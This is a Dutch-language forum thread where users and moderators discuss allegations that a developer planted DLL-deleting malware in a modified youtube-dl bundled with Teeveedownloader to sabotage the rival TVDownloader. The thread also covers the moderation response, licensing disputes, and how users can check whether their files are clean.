Malware in Teeveedownloader en TVDownloader

Windows, Android, iOS, Linux, Chrome OS, ...
nickz
Elite Poster
Elite Poster
Berichten: 1533
Lid geworden op: 09 dec 2011, 17:55
Locatie: Gent
Uitgedeelde bedankjes: 178 keer
Bedankt: 220 keer

Waarom worden alle topics i.v.m. Teeveedownloader en TVDownloader (en de malware die Gautier daarin heeft verwerkt) verwijderd of onzichtbaar gemaakt?

Dat de topics voorlopig worden gesloten en de downloadlinks worden weggehaald zou ik perfect kunnen begrijpen, maar een beetje transparantie en vooral ook een waarschuwing voor alle gebruikers die mogelijk nog een schadelijke versie van deze tools op hun computer hebben staan zonder zich daar bewust van te zijn zou zeker niet misstaan!
kamiel
Elite Poster
Elite Poster
Berichten: 891
Lid geworden op: 18 jun 2012, 19:58
Uitgedeelde bedankjes: 167 keer
Bedankt: 42 keer

Ik ben heel blij met z'n werk! De nieuwe versie is ok.
Ik denk dat iemand die in staat is het programma te gebruiken ook wel beseft dat er in die vorige versie iets mis is! Als er vanzelf een porno site opent weet je wel genoeg...
Internet: EDPnet VDSL XS met Fritzbox 7360 als modem en router
VOIP: EDPnet (inkomend), Freevoipdeal (uitgaand) via C510IP
GSM: EDPnet (met Xiaomi Redmi)
nickz
Elite Poster
Elite Poster
Berichten: 1533
Lid geworden op: 09 dec 2011, 17:55
Locatie: Gent
Uitgedeelde bedankjes: 178 keer
Bedankt: 220 keer

Inderdaad, maar volgens wat ik daarstraks heb gelezen, werkte de malware van Gautier met een random-functie, waarbij er telkens 1 kans op 10 was dat de PC van de gebruiker ernstig werd beschadigd (o.a. alle DLL-bestanden in Program Files worden dan verwijderd).

Zelf heb ik nog TVDownloader 1.9 op mijn PC staan. Geen idee of die ook getroffen is. Aanvankelijk werkte deze normaal, maar dat
Modbreak:
taalgebruik
stuk uitschot
van een Gautier heeft zelf toegegeven dat hij timers in zijn versie van youtube-dl heeft verwerkt, die dus mogelijk de malware pas op een bepaalde datum activeren. Ik durf het in ieder geval niet meer te gebruiken en de nieuwe versie kan ik nu ook niet meer downloaden.

Veel mensen bezoeken Userbase ook niet elke dag. Ik heb daarstraks de informatie over die malware toevallig gelezen, ondertussen is ze al weg. Voor hetzelfde geld wist ik dus van niets zoals vele mensen wellicht. Iemand vroeg daarnet in een ander topic waar het topic van TVDownloader naartoe is. Ik antwoordde daarop met de informatie over die malware en kort daarna is dat topic eveneens verdwenen. Geen idee of die persoon dat nog op tijd heeft gelezen...

Ik heb veel respect voor de moderators en administrators van Userbase die hun vrije tijd steken in dit schitterende forum, maar deze gang van zaken vind ik toch niet echt correct. Het lijkt een beetje op de Belgische overheid die weer één of ander voedingsschandaal probeert stil te houden terwijl de nietsvermoedende burger de vergiftigde voeding blijft consumeren (al is het in dit geval waarschijnlijk eerder een weinig doordachte paniekreactie en niet het moedwillig verzwijgen van informatie om politieke redenen).
FlashBlue
Erelid
Erelid
Berichten: 2114
Lid geworden op: 20 jan 2006, 21:08
Locatie: Gent
Uitgedeelde bedankjes: 1022 keer
Bedankt: 296 keer

Je hebt een punt Nickz, echter denk ik dat je niet alles hebt meegekregen, dus bij deze :
K ga je niet alle details geven, maar een paar grote lijnen, en wat er vandaag voorgevallen is, en wat tot jouw nieuw topic hier geleid heeft:

We zijn reeds van in Juni aan het proberen die twee personen te laten samenleven op dit forum en om de spreekwoordelijke kerk in het midden te houden, omdat we van het idee zijn dat beiden "boter op hun hoofd hebben".

Het is begonnen met Gautier die steeds opdringeriger werd (ook naar de moderators toe) en wou dat we de andere tool (hoewel die er eerder was) zouden verwijderen van het forum, omdat hij de andere maker ervan beschuldigde zijn software te kopieren.

Na een paar interventies leek hij gekalmeerd, echter is hij dan blijkbaar (volgens analyses van derden) achter de schermen allerlei fishy dingen in zijn programma beginnen steken. En is hij wederom mensen beginnen beschuldigen en dingen eisen, en heeft zelfs een duplicate account aangemaakt.

xplorr van zijn kant heeft al-dan-niet blijkbaar gebruikt gemaakt van een aangepaste youtube-dl implementatie (youtube-dl is public domain overigens) van gautier, en ook een dubbelaccount gemaakt om gautier zijn gedrag aan de kaak te stellen en de boel onder een alias te proberen beinvloeden.

Meerdere pogingen om een einde te maken aan hun gedrag de afgelopen dagen hebben tot het volgende geleid:
-Ik persoonlijk heb vandaag na een zoveelste uitbarsting van beide kanten , BEIDE topics gesloten en voorzien van een waarschuwing over de malware. (zie bijlage voor de waarschuwing)
teveedownloader.png
-Naar aanleiding daarvan is Gautier weer begonnen met in andere topics vuil te spuien en Moderators aan te vallen via prive berichten met ongegronde dreigementen en grootspraak.
-Als gevolg daarvan is door een Admin ingegrepen, zijn door hem beide topics verplaatst naar een afgesloten forumdeel (en hierbij is idd de waarschuwing ook mee verplaatst), en beide partijen hebben een bericht ontvangen van de Admins met de nodige details.


Als gevolg van de hele situatie zal de twee personen hun software, en hun situatie op dit forum natuurlijk ook herbekeken worden. Terzijnertijd zal het verdict wel duidelijk worden, dat ligt nu bij de admins en niet meer bij de moderators, omdat beide personen het op de top gedreven hebben.

Je hebt gelijk dat je recht had op openheid hierover Nickz, hopelijk kan je nu een beetje beter de situatie volgen, en heb je begrip voor de gang van zaken van vandaag.


En voor de duidelijkheid: Ik laat dit topic voorlopig open, reageren op de kern van de zaak kan natuurlijk.
MAAR: Als er hier weer zwartmakerij, vuilgespui of ander onzin van een van beide partijen of medestanders komt, zal het snel "over en uit" zijn.
steveschumi
Starter
Starter
Berichten: 8
Lid geworden op: 05 jul 2017, 10:18
Bedankt: 1 keer

Ik gebruikte ook de teeveedownloader. En heb nooit problemen ondervonden, geen websites die zomaar openden of andere rare dingen. Werkte steeds goed. De hele discussie heb ik gelezen tussen de beidde heren. En vind de reactie van de mods en admins juist. Ik hoop alleen dat de juiste versie die proper is dus zonder al dan niet malware of wat weet ik. Zijn weg terug vind. Want het prog was super super handig. Ik heb tvdownloader niet gebruikt dus daar kan ik niets van zeggen of deze correct werkte.

Hopelijk blijft dit topic open zodat we op de hoogte worden gehouden. Zonder een of andere te beschuldigen. En dat het betreffende prog goed werkt en proper is. Zodat we het kunnen gebruiken zonder dat je pc ineens rare dingen doet.
domi80
Starter
Starter
Berichten: 7
Lid geworden op: 09 feb 2013, 15:03
Bedankt: 1 keer

Flashblue.
Dank je voor de toelichting. Ik heb de voorgeschiedenis niet gezien. Ik zag alleen de nieuwe account van 26-08 met beschuldigingen en 'bewijs' waarvan ik niet zag wat er wou bewezen worden. Vaag gedoe.
Gautier had een oproep ivm. overname of verder zetten van zijn werk. Op privéberichten daarover heeft hij niet gereageerd.
Het in gebruik nemen van de teeveedownloader op een fris geïnstalleerde PC ging niet. Iets met ontbrekende certificaten, beweerde hij.
Ik moest een nieuwe download doen, hij had ze bijgewerkt.
Dan maar gedaan. Werkte toen wel.
Vage boel.
Tricky? De kans bestaat.
Verder vreemd dat zijn eigen bijwerkingen aan een opensource-project niet meer opensource zijn.

Signalen?
Donnow.

De mededeling over timers kon ik niet plaatsen. Ik kreeg ineens het idee dat we ineens middenin een oude vete zitten.

En vanavond was het forum niet toegankelijk.

Op zich 'blij' dat er een nieuw forum is, en er duidelijkheid/schets is. Dank je.

Eerder vandaag las ik elders al dat er voor de youtube-dl wel meer GUI's gemaakt zijn, en er evenveel bestaan met (kans op) malware.
Niet verwonderlijk, maar jammer.

En nu komen de verhalen samen.

Ik hoop dat de admin's er uit komen.

En dat de twee personen ophouden met haantje spelen en zich acceptabel zullen gedragen.
nickz
Elite Poster
Elite Poster
Berichten: 1533
Lid geworden op: 09 dec 2011, 17:55
Locatie: Gent
Uitgedeelde bedankjes: 178 keer
Bedankt: 220 keer

Bedankt voor de verduidelijking FlashBlue. Ik wist niet dat dit spelletje al zo lang aan de gang was. Jammer dat het nu tot zo'n triest dieptepunt is gekomen, waarbij deze twee schitterende projecten worden verpest doordat de ene een te groot ego en een totaal gebrek aan ethiek heeft. Een onderdeel van de andere kopiëren en een dubbelaccount gebruiken om dat te verdoezelen is ook niet echt netjes, maar kwaadaardige code schrijven om nietsvermoedende gebruikers van het andere programma te treffen is wel van een heel andere orde.

Ik hoop dat TVDownloader toch nog verder ontwikkeld zal worden (liefst open-source en op basis van de originele youtube-dl), want in iemand die timers en malware in zijn software verstopt heb ik geen enkel vertrouwen meer, die is meerdere bruggen te ver gegaan en zou als het aan mij ligt stante pede een levenslange ban krijgen op dit forum.

Via de cache van Google heb ik de downloadlink voor TVDownloader v1.12 teruggevonden. Kan iemand met zekerheid bevestigen dat deze 100% veilig is?
BertG3
Administrator
Administrator
Berichten: 1784
Lid geworden op: 27 okt 2014, 20:46
Uitgedeelde bedankjes: 172 keer
Bedankt: 201 keer

Mijn vraag is dan: Als Xplorr effectief de code van Gautier gekopieerd heeft, heeft hij dan de malware niet meegekopieerd ?
Gebruikersavatar
xplorr
Plus Member
Plus Member
Berichten: 119
Lid geworden op: 29 jul 2013, 18:38
Uitgedeelde bedankjes: 21 keer
Bedankt: 7 keer

Kort zakelijk antwoord: ik bevestig dat versie 1.12 vrij is van malware. Ik heb 2 dagen intensief gezocht om de malware code eruit te halen.
Ik heb uitvoerig gemeld en beschreven waar de malware zat (helaas is het forum nu offline).
Ik vertrek nu van de officiële cleane versie van youtube-dl. Ik ben trouwens zelf een hele dag bezig geweest om de gedelete dll's (door de malware) terug op mijn computer te krijgen. Nog steeds deels niet in orde. Heb ook andere gebruikers geholpen om hun pc terug in orde te brengen.
nickz
Elite Poster
Elite Poster
Berichten: 1533
Lid geworden op: 09 dec 2011, 17:55
Locatie: Gent
Uitgedeelde bedankjes: 178 keer
Bedankt: 220 keer

"De code van Gautier" is een beetje te veel eer... Het gaat over de door Gautier bijgewerkte (en geboobytrapte) versie van het open-source project youtube-dl. En ja, Xplorr heeft die malware mee gekopieerd, waardoor de problemen zijn beginnen opduiken. Volgens de laatste berichten die ik had gelezen (en die nu verwijderd zijn), zou de youtube-dl in TVDownloader v1.12 gebaseerd zijn op de originele versie en niet die van Gautier.

Edit: ik zie nu net de bevestiging van Xplorr. Ik hoop dat we hierop kunnen vertrouwen.
Gebruikersavatar
xplorr
Plus Member
Plus Member
Berichten: 119
Lid geworden op: 29 jul 2013, 18:38
Uitgedeelde bedankjes: 21 keer
Bedankt: 7 keer

Correct: het gaat om versie 1.12 van vandaag. Dus niet die van zondag (die moet je van je computer verwijderen).
Ik gebruikte in mijn eerste versie van TVDownloader, toen Teeveedownloader nog niet bestond, de officiële versie van youtube-dl.
Nadien gebruikte ik inderdaad de youtube-dl van Gautier, wegens de betere kwaliteit (tot zaterdag).
Youtube-dl is inderdaad open-source. En het is de bedoeling dat je dat deelt met elkaar. Mijn huidige versie van youtube-dl mag iedereen inkijken en delen. Ik begrijp dat je daar veel werk in steekt, maar dat geldt voor alle auteurs van youtube-dl die hun werk delen. Dat is de sterkte van internet en open-source. Delen en niet afschermen.
Gebruikersavatar
Goztow
Administrator
Administrator
Berichten: 14441
Lid geworden op: 14 nov 2006, 16:21
Locatie: Brussel
Uitgedeelde bedankjes: 1600 keer
Bedankt: 1194 keer
Recent bedankt: 6 keer

De topics "Hoe VRT video stream bewaren op je computer?" en "Teeveedownloader" hebben de voorbije dagen nogal wat stof doen opwaaien op userbase. We zijn niet gewoon om censuur op te leggen en we steunen het ontwikkelen van nieuwe initiatieven voor users, maar ik wens niet dat userbase het forum wordt waarop een vete wordt uitgevochten. Persoonlijk heb ik de indruk dat de makers beter af zouden zijn om samen te werken aan één enkele tool en zo efficiënter te werken. Ik vermoed echter dat de bruggen ondertussen verbrand zijn.

beide topics "Hoe VRT video stream bewaren op je computer?" en "Teeveedownloader" zijn voorlopig naar een privaat subforum gebracht want ik vrees dat het zo niet verder kan. Bovendien moeten wij toch ook een beetje opletten met waar we naar linken, zeker als er rare code in kan zitten.

Ik laat jullie nog weten wat we uiteindelijk zullen beslissen. Wat communicatie betreft, het is niet altijd eenvoudig om heel snel te zijn hierin. Ik raad momenteel aan geen van beide programma's te gebruiken maar ik ben geen coder dit is puur buikgevoel
Maarten Roels
Starter
Starter
Berichten: 19
Lid geworden op: 04 maa 2017, 10:59
Bedankt: 3 keer

xplorr schreef:Correct: het gaat om versie 1.12 van vandaag. Dus niet die van zondag (die moet je van je computer verwijderen).
Ik gebruikte in mijn eerste versie van TVDownloader, toen Teeveedownloader nog niet bestond, de officiële versie van youtube-dl.
Nadien gebruikte ik inderdaad de youtube-dl van Gautier, wegens de betere kwaliteit (tot zaterdag).
Youtube-dl is inderdaad open-source. En het is de bedoeling dat je dat deelt met elkaar. Mijn huidige versie van youtube-dl mag iedereen inkijken en delen. Ik begrijp dat je daar veel werk in steekt, maar dat geldt voor alle auteurs van youtube-dl die hun werk delen. Dat is de sterkte van internet en open-source. Delen en niet afschermen.
Ik heb deze versie 1.12 gedownload, en ik kan bevestigen dat deze CLEAN is.
Ook al ken ik er niet zoveel van, zou de 1.12 gebaseerd zijn op de officiële versie van youtube-dl. Bovendien zit xplorr zelf met malware (net zoals ik) en zijn een heel aantal DLL bestanden gewoonweg verdwenen. Ik laat het onderzoek over aan de Admins van het forum, en ik kan alleen maar hopen dat de goeden het deze keer niet moeten bekopen van de slechten. Laat ons voor één keer in ons Belgenland de goede beslissing nemen.
Riparius
Starter
Starter
Berichten: 20
Lid geworden op: 28 aug 2017, 17:27

steveschumi schreef:Ik gebruikte ook de teeveedownloader. En heb nooit problemen ondervonden, geen websites die zomaar openden of andere rare dingen. Werkte steeds goed. De hele discussie heb ik gelezen tussen de beide heren. En vind de reactie van de mods en admins juist. Ik hoop alleen dat de juiste versie die proper is dus zonder al dan niet malware of wat weet ik. Zijn weg terug vind. Want het prog was super super handig. Ik heb tvdownloader niet gebruikt dus daar kan ik niets van zeggen of deze correct werkte.

Hopelijk blijft dit topic open zodat we op de hoogte worden gehouden. Zonder een of andere te beschuldigen. En dat het betreffende prog goed werkt en proper is. Zodat we het kunnen gebruiken zonder dat je pc ineens rare dingen doet.
Iemand die uitsluitend Teeveedownloader gebruikt via de bijgeleverde GUI zal geen problemen krijgen, ook niet als de versie van youtube-dl.exe in kwestie kwaadaardige code bevat. Die kwaadaardige code was uitsluitend bedoeld om de ontwikkelaar van TVDownloader dwars te zitten en in een kwaad daglicht te stellen nadat die laatste telkens de meest recente gecompileerde versie van youtube-dl.exe van Teeveedownloader was gaan gebruiken in plaats van zelf aanpassingen te maken.

Verder: de gecompileerde versies van youtube-dl.exe zoals die worden meegeleverd met Teeveedownloader bevatten al langer een timer, maar die heeft niets te maken met malware. De timer zorgt er uitsluitend voor dat de gecompileerde versie van youtube-dl.exe zoals die wordt meegeleverd met Teeveedownloader na een bepaalde datum niet meer werkt.

Het spreekt vanzelf dat het doelbewust toevoegen van kwaadaardige code om een concurrerende ontwikkelaar dwars te zitten en daarbij ook nog nietsvermoedende gebruikers van het concurrerende product te duperen niet acceptabel is. Daar staat tegenover dat het ook niet helemaal netjes was van de ontwikkelaar van TVdownloader om kennelijk zonder overleg de gecompileerde versies van youtube-dl.exe van Teeveedownloader in het eigen programma te gaan gebruiken. Maar de reactie hierop van de ontwikkelaar van Teeveedownloader was buiten elke proportie. Tot slot is op te merken dat het gebruik van een vrij programma gebaseerd op open source projecten niet kunstmatig in de tijd zou moeten zijn beperkt. Het argument van de ontwikkelaar van Teeveedownloader dat dit is gedaan omwille van het feit dat het programma inloggegevens kan opslaan is niet overtuigend, er zijn tenslotte veel andere freeware programma's (zoals email clients of programma's voor het beheer van wachtwoorden) die eveneens inloggegevens kunnen opslaan en die nochtans zonder beperking in de tijd kunnen worden gebruikt.
Laatst gewijzigd door Riparius 29 aug 2017, 10:00, in totaal 3 gewijzigd.
domi80
Starter
Starter
Berichten: 7
Lid geworden op: 09 feb 2013, 15:03
Bedankt: 1 keer

Hoe weet je of iets clean is?
Eén keer een antivirus programma er over?
Broncode ontleden?
Iets tussenin? Iemand wat raadgevingen?

Mijn PC start nog gewoon goed op. Surfen gaat netjes. DLL's zijn aanwezig.
Deze PC wordt gebruikt als muziek-speler (Winamp + Firefox voor Youtube) en om eens wat te downloaden met de tool. Meer niet.
Misschien niet de meest representatieve PC. Maar ook deze zou gewoon moeten vatbaar zijn voor malware.
Mocht ik wat tegenkomen, wordt het een clean install. Je weet immers nooit wat er achter blijft van malware, openingen, poortjes, wekkers, ...

Flashblue schrijft dat beide tools bekeken worden door de admins.
Ik hoop het resultaat van hun onderzoek te mogen lezen, zodra dat kan.

Ik kende alleen het werk van G.
Ik had gereageerd op de oproep om over te nemen op 31-08. Stilte.
Bijkomende suggestie om een setup.exe te maken, hoefde niemand nog te klagen over de 'full' of 'upgrade'. Vond hij overbodig.
Gemiste kans, denk ik.
Gezien wat er daarna is gebeurd: Misschien beter zo.

Dus een stilgevallen project.
En twee tools die worden geëvalueerd en we beter af blijven.

Het kriebelde om zelf wat te maken. Het kriebelt nog steeds en meer en meer. Misschien moet ik er maar voor gaan.
Starten met de officiële youtube-dl.

Wat waren deze twee tools, buiten de component youtube-dl? Een grafische schil om niet met een command line te moeten werken?
Aangevuld met code ivm. bestandsnaming en de ffmpeg ivm. conversie van flv naar iets anders?
Gebruikersavatar
Goztow
Administrator
Administrator
Berichten: 14441
Lid geworden op: 14 nov 2006, 16:21
Locatie: Brussel
Uitgedeelde bedankjes: 1600 keer
Bedankt: 1194 keer
Recent bedankt: 6 keer

Wij zijn geen coders, wij gaan geen code analyseren.
Riparius
Starter
Starter
Berichten: 20
Lid geworden op: 28 aug 2017, 17:27

domi80 schreef:Hoe weet je of iets clean is?
Eén keer een antivirus programma er over?
Broncode ontleden?
Iets tussenin? Iemand wat raadgevingen?
Broncode ontleden, maar dat is inmiddels gedaan. Helaas is het topic waar de bevindingen zijn gepost momenteel niet toegankelijk. Malware scanners waren hier betrekkelijk nutteloos, die lieten het probleem niet zien.
Mijn PC start nog gewoon goed op. Surfen gaat netjes. DLL's zijn aanwezig.
Deze PC wordt gebruikt als muziek-speler (Winamp + Firefox voor Youtube) en om eens wat te downloaden met de tool. Meer niet.
Misschien niet de meest representatieve PC. Maar ook deze zou gewoon moeten vatbaar zijn voor malware.
Mocht ik wat tegenkomen, wordt het een clean install. Je weet immers nooit wat er achter blijft van malware, openingen, poortjes, wekkers, ...
Als je uitsluitend Teeveedownloader hebt gebruikt of nog gebruikt, dan heb je niets te duchten, ook niet als je een versie hebt waarbij youtube-dl.exe de kwaadaardige code in kwestie bevat.
Flashblue schrijft dat beide tools bekeken worden door de admins.
Ik hoop het resultaat van hun onderzoek te mogen lezen, zodra dat kan.
Inmiddels is wel duidelijk hoe de vork in de steel zit, helaas zijn de betreffende topics momenteel niet toegankelijk.
Ik kende alleen het werk van G.
Ik had gereageerd op de oproep om over te nemen op 31-08. Stilte.
Bijkomende suggestie om een setup.exe te maken, hoefde niemand nog te klagen over de 'full' of 'upgrade'. Vond hij overbodig.
Gemiste kans, denk ik.
Gezien wat er daarna is gebeurd: Misschien beter zo.
Ik denk ook dat een setup.exe nutteloos zou zijn, het gaat namelijk om een in wezen portable tooltje dat niets in de registry hoeft te schrijven en dat zonder installatie direct is te gebruiken.
Dus een stilgevallen project.
En twee tools die worden geëvalueerd en we beter af blijven.
Je kunt de tooltjes gewoon blijven gebruiken, van TVdownloader dan wel de meest recente versie 1.12 en geen oudere versies gebruiken.
Het kriebelde om zelf wat te maken. Het kriebelt nog steeds en meer en meer. Misschien moet ik er maar voor gaan.
Starten met de officiële youtube-dl.

Wat waren deze twee tools, buiten de component youtube-dl? Een grafische schil om niet met een command line te moeten werken?
Aangevuld met code ivm. bestandsnaming en de ffmpeg ivm. conversie van flv naar iets anders?
Er komt heel wat meer bij kijken, zoals code die flexibel om kan gaan met de diverse websites om relevante URLs op te vissen.
Gebruikersavatar
xplorr
Plus Member
Plus Member
Berichten: 119
Lid geworden op: 29 jul 2013, 18:38
Uitgedeelde bedankjes: 21 keer
Bedankt: 7 keer

Ik zal proberen op een constructieve en rustige manier zoveel mogelijk transparantie rond dit thema te brengen.
Mijn uitgangspunt om TVDownloader te beginnen was voor eindgebruikers die niet technisch zijn een eenvoudige één pagina user-interface te voorzien bovenop youtube-dl. Reden: het geeft me ontzettend veel voldoening om anderen te helpen.

Eerst en vooral om op de vraag van hierboven te antwoorden: "Hoe weet je of iets clean is?".
Dat is nooit 100% zeker. Als je alleen van je eigen anti-virus software uitgaat ben je niet zeker (bewijs is de afgelopen dagen geleverd).
Ik raad daarom aan om bestanden steeds te checken op https://www.virustotal.com/en/.
Daar worden bestanden tegen ongeveer 65 antivirus programma's gecheckt, maar zelfs daar kan een niet technisch persoon niet altijd de juiste conclusies uit trekken. Als je bv. TVDownloader door virustotal laat checken zal je zien dat 7 van de 65 virusscanners een probleem geven. Het gaat hier wel om de kleine, meestal aziatische virusscanners die reageren: https://www.virustotal.com/en/file/2389 ... /analysis/
Als je Teeveedownloader laat testen door virustotal kom je zelfs aan 11 alerts! Daar zijn enkele grote namen bij die reageren: https://www.virustotal.com/en/file/65af ... /analysis/
Maar het feit dat de kleine virusscanners reageren is doordat zowel TVDownloader als Teeveedownloader gebruik maken van een scriptcompiler die dikwijls ook door malafide programmeurs gebruikt worden. Het is de de scriptengine die gevlagd wordt, niet de broncode zelf.
Dat is punt één.

Vervolgens kan je de code gaan ontleden.
TVDownloader bevat geen timers, afscherming, noch bewust geschreven malafide code. Ik roep iedereen op om dit ook te onderzoeken en zal op alle vragen zo goed mogelijk antwoorden. TVDownloader is geschreven in HTA (https://en.wikipedia.org/wiki/HTML_Application), wat op html gebaseerd is. Als je op de UI rechts klikt kan je dan ook ten allen tijde de broncode zien, zoals je dat van eender welke html pagina ook kan doen. Simpele straightforward html.

Om de engine youtube-dl te ontleden moet je wel wat meer inspanning doen. Je kan ten allen tijde ook die code onderzoeken, zelfs van een gecompileerde exe. Youtube-dl is geschreven in Python. De exe kan je gewoon openen met 7zip. Probleem is dat je wel meer dan 1000 broncode files moet gaan doorploeteren wat vrijwel onbegonnen werk is. De malware die ik gevonden heb zat in het bestand options.pyo.
Zo'n brondcodebestand kan je decompilen met een tool zoals Easy Python Decompiler.

De originele brondcode van youtube-dl kan je ook terugvinden op github, maar gezien onze Vlaamse tv-zenders de laatste tijd om de haverklap hun websites veranderen moeten daar aanpassingen aan gebeuren. Ik heb vernomen dat de releasemethode nogal traag is, zodat je niet heel snel op de bal kan spelen als je snel wijzigingen wil aanbrengen, maar kan dit zelf niet bevestigen, want heb geen ervaring met github. Als ik aanpassingen moet doen aan youtube-dl, doe ik dat op een lokale kopie die ik dan compile naar een .exe. Compilen kan via het commando: python.exe setup.py py2exe.
Ideaal zou zijn dat er een branch komt van youtube-dl op github, waaraan de knappe koppen uit Vlaanderen dan zouden kunnen meewerken, om snel aanpassingen te doen als de Vlaamse zenders hun website wijzigen. Iedereen die bovenop youtube-dl een eigen UI wil schrijven kan gebruik maken van deze versie.
Laatst gewijzigd door xplorr 29 aug 2017, 08:36, in totaal 1 gewijzigd.
Italbelg
Starter
Starter
Berichten: 2
Lid geworden op: 28 aug 2017, 22:52
Bedankt: 2 keer

Intussen staat het nieuwe schooljaar voor de deur en kan ondergetekende zijn belofte aan zijn vrouw niet waarmaken: "ik haal die Canvas reportage wel even van de website af nu die nog even beschikbaar is zodat je die later kunt gebruiken in de klas, daar bestaat een mooi tooltje voor!".
Blijkt dat mijn verouderde versie met vrtnu van vandaag niet meer werkt en alle toegang tot een werkende versie - met blijkbaar toch tevreden gebruikers - afgesloten blijkt. Natuurlijk begrijp ik de bezorgdheid om gebruikers te beschermen, maar toch jammer dat het kind met het badwater weggegooid wordt...
En zoals altijd is de klant de dupe :-(
Gebruikersavatar
xplorr
Plus Member
Plus Member
Berichten: 119
Lid geworden op: 29 jul 2013, 18:38
Uitgedeelde bedankjes: 21 keer
Bedankt: 7 keer

Ik wil je graag verder helpen. De link naar TVDownloader bestaat nog steeds en bevat steeds de laatste versie, maar ik neem aan dat ik die hier momenteel niet mag plaatsen. Google even en je vindt wel.
nickz
Elite Poster
Elite Poster
Berichten: 1533
Lid geworden op: 09 dec 2011, 17:55
Locatie: Gent
Uitgedeelde bedankjes: 178 keer
Bedankt: 220 keer

Riparius schreef:Iemand die uitsluitend Teeveedownloader gebruikt via de bijgeleverde GUI zal geen problemen krijgen, ook niet als de versie van youtube-dl.exe in kwestie kwaadaardige code bevat. Die kwaadaardige code was uitsluitend bedoeld om de ontwikkelaar van TVDownloader dwars te zitten en in een kwaad daglicht te stellen nadat die laatste de gecompileerde versie van youtube-dl.exe van Teeveedownloader was gaan gebruiken.
Het maakt niet uit voor wie of wat die kwaadaardige code bedoeld was. Het feit dat iemand dergelijke boobytraps programmeert in software (van een open-source project dan nog), waar onschuldige nietsvermoedende gebruikers slachtoffer van worden, is uiterst verderfelijk en op geen enkele manier goed te praten. Ik zal dan ook NOOIT nog iets gebruiken dat geprogrammeerd is door die persoon, die aan een narcistische persoonlijkheidsstoornis lijkt te lijden.

Wie ben jij overigens? Account gisteren aangemaakt en maar 2 posts, allebei in dit topic. Weer een dubbelaccount van Gautier?
vverbeke
Elite Poster
Elite Poster
Berichten: 935
Lid geworden op: 19 mei 2009, 11:31
Uitgedeelde bedankjes: 60 keer
Bedankt: 94 keer

Ik heb de hele discussie totaal niet gevolgd, de software ook nooit gebruikt. Maar als klopt wat hier geschreven is, dat er doelbewust malware in software gestoken is, dan vind ik dat hier nog vrij licht over gegaan wordt. Een forumban stelt uiteindelijk niet veel voor, malware verspreiden is een crimineel feit dat als dusdanig behandeld moet worden (d.w.z. aangifte bij politie door één of meerdere slachtoffers). Userbase beschikt over het IP adres van de persoon in kwestie, vermoed ik. Heeft iemand al zo'n besmette setup doorgestuurd naar een paar anti-virus leveranciers?
@home: VDSL 100/35 • @work: fiber 200/200 + fiber 300/50 + cable 240/30
Gebruikersavatar
xplorr
Plus Member
Plus Member
Berichten: 119
Lid geworden op: 29 jul 2013, 18:38
Uitgedeelde bedankjes: 21 keer
Bedankt: 7 keer

Probleem is dat de kwaadaardige youtube-dl file in kwestie (options.py) door geen enkele van de 52 virusscanners wordt herkend als malware o.a. omdat de strings base64 waren ge-encodeerd: https://www.virustotal.com/en/file/33f4 ... 503995886/
Het gaat ook niet om een virus (virus heeft de eigenschap zich verder te verspreiden). Het gaat om malware geschreven om at random de pc te laten herstarten, dll bestanden te laten verwijderen uit de programs folders en om de desktop om zeep te helpen.

Wat gebeurd is kan niet door de beugel, maar ik zou het verhaal nu ook niet op de spits willen drijven. Ik ben niet wraakbelust. Ik zal zeker geen klacht neerleggen. Er is al genoeg miserie op de wereld. Uiteindelijk was het de bedoeling van de schrijver om mij persoonlijk te raken, maar tegelijk werden ook een aantal gebruikers slachtoffer, waarvan ik al minstens één zo goed als mogelijk heb kunnen verder helpen. Mijn pc is terug in orde. Zijn pc zo goed als.

Een gepaste sanctie zou zijn dat G. zich ter beschikking stelt van alle slachtoffers om hun pc terug in orde te zetten. :wink:

Om toekomstige gebruikers gerust te stellen zal ik vandaag versie 1.12 doorsturen naar Symantec/Norton en Avast voor diepgaande analyse door de bedrijven. Zodra ik daar nieuws van heb zal ik dat hier posten.
boran_blok
Elite Poster
Elite Poster
Berichten: 1021
Lid geworden op: 09 maa 2011, 16:04
Uitgedeelde bedankjes: 16 keer
Bedankt: 81 keer

Even alles op een rijtje:

youtube-dl is een open source project: Attribution-ShareAlike 3.0 Unported

Gautier pakt deze basis versie en bereid deze uit/past dingen aan zodat vlaamse websites als bron kunnen dienen hij schrijft ook een front-end voor youtube-dl genaamd teeveedownloader

xplorr heeft een front-end geschreven voor youtube-dl genaamd TVDownloader deze werkt met de originele youtube-dl en de youtube-dl van Gautier

Gautier heeft niet graag dat zijn versie van youtube-dl gebruikt wordt door xplorr en er is een conflict.

Gautier past zijn versie van youtube-dl aan zodat deze cruciale bestanden delete indien deze draait in een andere context dan teeveedownloader (of is het specifiek gericht op als het draait in TVDownloader?)

Versta ik het correct of mis ik nog iets?


Dit alles terzijde volgens de CC licentie aan youtube-dl zijn alle aanpassingen die Gautier maakt aan de code verplicht Share-Alike te delen onder dezelfde licentievoorwaarden:
ShareAlike — If you remix, transform, or build upon the material, you must distribute your contributions under the same license as the original.
Met andere woorden hij kan zijn applicatie niet distribueren zonder zijn code van zijn aanpassingen ook publiek te maken.

Maar naar wat ik nog versta distribueert Gautier een eigen youtube-dl implementatie zonder zijn code te publiceren? Indien dit het geval is is hij in elk geval niet in overeenstemming met de youtube-dl licentievoorwaarden.

Aan de andere kant worden er ook geen garanties verleend voor het werk. Ik weet niet hoe legaal sterk een claim staat als je maar de code moest lezen alvorens je iets integreert in je eigen applicatie. (even advocaat van de duivel spelen)

edit: dit stuk uit de licentie over het hoofd gezien:
No additional restrictions — You may not apply legal terms or technological measures that legally restrict others from doing anything the license permits.
Sorry er is naar mijn mening weinig discussie indien de feiten zijn wat ze zijn. Gautier is in elk geval in overtreding met de licentievoorwaarden van youtube-dl en staat dus open ter vervolging/aanklacht op dat vlak. Daarnaast denk ik dat er ook computermisdaden begaan zijn en indien xplorr of een andere benadeelde klacht zou indienen denk ik dat er wel een zaak van te maken is. (of de overwerkte flikken er ook iets mee gaan doen is wat anders)
Laatst gewijzigd door boran_blok 29 aug 2017, 11:32, in totaal 1 gewijzigd.
Bababa
Premium Member
Premium Member
Berichten: 648
Lid geworden op: 28 jul 2014, 19:20
Uitgedeelde bedankjes: 26 keer
Bedankt: 35 keer

Ik volg niets van dit topic, het enige dat ik wil weten: met welke tool kan ik nu nog afleveringen downloaden van de VRTNU website?
Orange Love Trio
Orange Flybox
Orange Extra surf card
Gebruikersavatar
Goztow
Administrator
Administrator
Berichten: 14441
Lid geworden op: 14 nov 2006, 16:21
Locatie: Brussel
Uitgedeelde bedankjes: 1600 keer
Bedankt: 1194 keer
